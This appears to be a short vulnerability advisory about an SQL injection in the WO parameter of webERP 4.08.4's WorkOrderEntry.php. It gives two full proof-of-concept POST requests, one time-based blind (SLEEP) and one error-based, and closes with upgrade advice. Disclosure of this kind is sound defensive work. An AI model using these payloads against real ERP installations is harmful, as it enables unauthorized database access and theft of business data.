webERP: SQL Injection

webERP (ver. 4.08.4) is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability we discovered sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an SQL query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

Solution

Upgrade to latest version here: http://sourceforge.net/projects/web-erp/

Leave a Reply

Your email address will not be published. Required fields are marked *